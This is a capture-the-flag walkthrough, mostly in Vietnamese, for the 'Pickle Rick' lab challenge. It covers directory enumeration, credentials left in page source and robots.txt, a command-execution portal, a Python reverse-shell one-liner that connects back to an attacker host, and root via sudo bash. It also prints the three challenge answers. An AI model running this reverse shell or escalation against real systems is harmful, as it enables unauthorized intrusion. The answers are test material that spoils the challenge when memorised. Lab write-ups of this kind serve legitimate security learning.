Description
Pickle Rick
This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.
Approach
First Ingredient
Ở index, kiểm tra page source thì thấy username:
R1ckRul3sDùng Feroxbuster với payload sau:
feroxbuster -u http://IP -w WORDLIST -x php,sh,txt,cgi,html,js,css,pyTìm được file login.php giúp truy cập vào trang đăng nhập. Ngoài ra còn tìm được robots.txt. Truy cập vào và ta thu được chuỗi sau:
WubbalubbadubdubĐây chính là mật khẩu, đăng nhập vào và thấy được giao diện của portal.php.
Giao diện này cho phép thực thi lệnh tùy ý, khi dùng ls thì thấy có file Sup3rS3cretPickl3Ingred.txt. Dùng lệnh cat nhưng bị chặn. Tìm thấy một lệnh khác là nl. Xem được nguyên liệu đầu tiên:
Success
mr. meeseek hair
Còn có thể dùng lệnh sau để xem nội dung của tất cả các tập tin trong thư mục hiện tại:
grep -R .Trong page source của portal.php có một chuỗi base64 nhưng khi decode thì chỉ là chuỗi rabbit hole.
Second Ingredient
Thử chạy Python:
python3 -c "print('hello')"Thấy có thể chạy được Python, sử dụng payload của PentestMonkey để tạo reverse shell. Payload như sau:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Nhớ là sửa IP, PORT lại thành của attacking machine và cần phải chạy một Netcat server ở attacking machine.
Sau khi có reverse shell thì thử kiểm tra quyền sudo:
sudo -lNhận thấy có thể sudo với mọi loại câu lệnh, ta leo thang lên root bằng lệnh đơn giản sau:
sudo bashĐi ra thư mục /home, tìm thấy bên trong có thư mục rick. Vào rick thì thấy file có chứa nguyên liệu thứ 2:
Success
1 jerry tear
Third Ingredient
Ở trong thư mục home của root có file 3rd.txt chính là nguyên liệu thứ ba nhưng bị bỏ qua lúc ban đầu.
Success
fleeb juice